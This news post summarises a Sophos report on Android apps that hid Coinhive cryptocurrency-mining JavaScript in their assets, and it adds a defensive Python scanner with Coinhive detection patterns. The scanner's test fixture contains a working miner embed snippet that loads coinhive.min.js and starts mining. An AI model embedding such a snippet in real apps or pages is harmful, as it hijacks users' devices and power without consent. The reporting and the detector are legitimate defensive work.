It seems there is no end to the crypto-jacking menace that has been plaguing the web of late. This post is based on a 13-page report released last week by Sophos, a UK cyber-security firm. According to the firm, its engineers discovered 19 Android apps that had been uploaded to and made available through the official Google Play Store.
According to Sophos, these 19 apps were covertly loading an instance of the Coinhive script behind users’ backs. Based on their analysis, the security researchers believe the app authors are the same person or group. The developers hid the Coinhive JavaScript mining code inside HTML files in the assets folder of the apps.
When a user opens one of the apps and it loads a WebView (Android’s stripped-down, embeddable browser component) instance, the malicious code is executed as well. In some cases, where an app had no apparent reason to open a browser window, the WebView component was hidden from view while the mining code ran in the background. Where the app is a news reader or a tutorial viewer, the Coinhive in-browser JavaScript miner runs alongside the app’s legitimate content while the unknowing user is using the app.
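As an added example (not code from the report or from this post), the following Python script scans an APK’s assets folder for HTML or JavaScript files that reference the Coinhive miner, the hiding place described above. The indicator strings are assumptions drawn from Coinhive’s public embed snippet, and the sample APK is a constructed in-memory zip.

```python
import io
import re
import zipfile

# Assumed indicators: the script URL and the constructor call from Coinhive's
# public embed snippet. Real APKs may obfuscate these; treat hits as a lead.
COINHIVE_PATTERNS = [
    re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I),
    re.compile(r"CoinHive\.(Anonymous|User)\s*\(", re.I),
    re.compile(r"authedmine\.com/lib/", re.I),
]


def scan_apk_assets(apk_bytes: bytes) -> list:
    """Return one finding per HTML/JS asset that references the Coinhive miner."""
    findings = []
    # An APK is an ordinary zip archive; only the assets/ tree is of interest here.
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            if not name.startswith("assets/"):
                continue
            if not name.lower().endswith((".html", ".htm", ".js")):
                continue
            text = apk.read(name).decode("utf-8", errors="ignore")
            hits = [p.pattern for p in COINHIVE_PATTERNS if p.search(text)]
            if hits:
                findings.append({"asset": name, "indicators": hits})
    return findings


def build_sample_apk() -> bytes:
    """Constructed in-memory APK-like zip: one clean asset, one carrying the miner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "<manifest/>")
        z.writestr("assets/help.html", "<html><body>Tutorial page</body></html>")
        z.writestr(
            "assets/news.html",
            '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
            "<script>var m = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER');"
            "m.start();</script>",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_apk_assets(build_sample_apk()):
        print(finding["asset"], "->", ", ".join(finding["indicators"]))
```

Point `scan_apk_assets` at the bytes of a real APK to list the assets that would warrant a closer look; an app with a hidden WebView plus such an asset matches the pattern Sophos describes.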
Sophos traced this technique to four developer accounts behind the 19 Android apps. Even though most of the infected apps barely have 100-500 installs, one app in particular (extreme.action.wwe.wrestin) was installed on 100,000 to 500,000 Android devices.
These 19 apps were uploaded to the Google Play Store around Christmas. Sophos has already reported its discovery of the infected apps to Google, and all of them had been removed from the official Play Store at the time of writing. Sophos lists all 19 Coinhive-infected apps on page 7 of its report, where users can check whether any of them are installed on their devices. On page 10 of the report, Sophos lists another set of malicious apps; these do not load the Coinhive JavaScript miner but instead embed the native cpuminer library to mine Bitcoin and Litecoin. Sophos refers to this Android malware as “CoinMiner” and states that it was found embedded in 10 apps made available through coandroid.ru, a third-party app store for Android.
Although many news sites have published a glut of articles about illegal crypto-currency mining, you should know that mining crypto-currency on a smartphone can damage the device permanently. This is based on analysis by researchers from Kaspersky, who demonstrated this when they discovered the Android malware called “Loapi”.
Note that you do not necessarily have to install a malware-laden Android app on your device to be affected. Just yesterday, security researchers from Malwarebytes found a malvertising campaign targeting users of Android mobile browsers. The campaign used malicious code hidden in ads to redirect users to sites that mine Monero while the unsuspecting users try to solve a CAPTCHA on the web page they were redirected to.